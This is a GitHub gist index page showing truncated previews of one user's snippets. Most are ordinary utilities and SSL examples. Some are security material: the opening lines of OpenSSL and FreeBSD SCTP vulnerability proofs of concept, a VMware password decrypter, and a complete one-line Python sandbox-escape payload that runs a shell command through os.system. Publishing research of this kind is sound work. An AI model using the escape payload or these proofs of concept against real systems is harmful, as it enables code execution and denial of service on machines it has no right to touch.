takeshixx
/ gist:11264187
Created
April 24, 2014 18:14
Parse jail parameters from FreeBSD /etc/rc.conf file (and all included files)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from sh import sh | |
| dict(_.split('=',1) for _ in [_ for _ in sh('-c','\n'.join([_.strip() for _ in open('/etc/rc.conf').read().split('\n') if not _.startswith('#') and _ is not ''])+'\nset').split('\n') if _.startswith('jail_')]) |
takeshixx
/ CVE-2014-0195.py
Created
June 10, 2014 07:10
— forked from hugsy/CVE-2014-0195.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # | |
| # OpenSSL heap overflow PoC | |
| # Found by ZDI - ZDI-14-173 // CVE-2014-0195 | |
| # PoC by @_hugsy_ | |
| # | |
| # Ref: https://tools.ietf.org/html/rfc6347 | |
| # | |
| import socket, struct |
takeshixx
/ vcops-passwords.py
Created
August 12, 2014 17:55
VMware vCenter Operations Manager password de/encrypter
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # VMware vCenter Operations Manager password de/encrypter | |
| # author: takeshix@adversec.com | |
| from sys import argv,exit | |
| from base64 import b64encode,b64decode | |
| from Crypto.Cipher import AES | |
| class vCopsCrypt: | |
| # AES128 wrapper class with PKCS5 padding | |
| BLOCK_SIZE = 16 |
takeshixx
/ gist:ba2b3af5226eea6b1d14
Created
December 22, 2014 12:41
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| {}.__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os').system('id') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Description='31C3 802.1x WiFi' | |
| Interface=wlp4s0 | |
| Connection=wireless | |
| Security=wpa-configsection | |
| IP=dhcp | |
| WPAConfigSection=( | |
| 'ssid="31C3"' | |
| 'key_mgmt=WPA-EAP' | |
| 'eap=TTLS' | |
| 'identity="randomusername"' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdio.h> | |
| #include <string.h> | |
| #include <unistd.h> | |
| #include <pty.h> | |
| #include <termios.h> | |
| #include <fcntl.h> | |
| #include <sys/select.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # -*- coding: utf-8 -*- | |
| DEBUG = True | |
| import dbus, gobject,re,pynotify | |
| from dbus.mainloop.glib import DBusGMainLoop | |
| dingregex = re.compile(r'(ding)',re.IGNORECASE) | |
| def check_ding(account, sender, message, conv, flags): | |
| sender = sender.encode('utf-8') | |
| message = message.encode('utf-8') | |
| obj = bus.get_object("im.pidgin.purple.PurpleService", "/im/pidgin/purple/PurpleObject") |
takeshixx
/ byebyebsd.py
Last active
January 22, 2016 20:06
FreeBSD SCTP ICMPv6 error message vulnerability (FreeBSD-SA-16:01.sctp / CVE-2016-1879) PoC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # FreeBSD SCTP ICMPv6 error message vulnerability (FreeBSD-SA-16:01.sctp / CVE-2016-1879) PoC | |
| # https://www.freebsd.org/security/advisories/FreeBSD-SA-16:01.sctp.asc | |
| # https://github.com/freebsd/freebsd/commit/51f55053b6565d2fe9b61f63460dddc23284a103 | |
| import sys | |
| from scapy.all import * | |
| if len(sys.argv) is not 3: | |
| print('{} target_ip interface'.format(sys.argv[0])) | |
| exit(1) |
takeshixx
/ secure_client.py
Created
May 2, 2016 14:12
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import socket | |
| import ssl | |
| import sys | |
| try: | |
| from pyasn1.codec.der import decoder | |
| from pyasn1_modules import rfc2459 | |
| except ImportError: | |
| print('Run: pip install pyasn1 pyasn1-modules') | |
| sys.exit(1) |
takeshixx
/ asyncio_ssl_example.py
Created
May 12, 2016 15:08
— forked from messa/asyncio_ssl_example.py
Python asyncio + SSL TCP client/server example
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import asyncio | |
| import multiprocessing | |
| import os | |
| import ssl | |
| from time import sleep | |
| port = 9000 |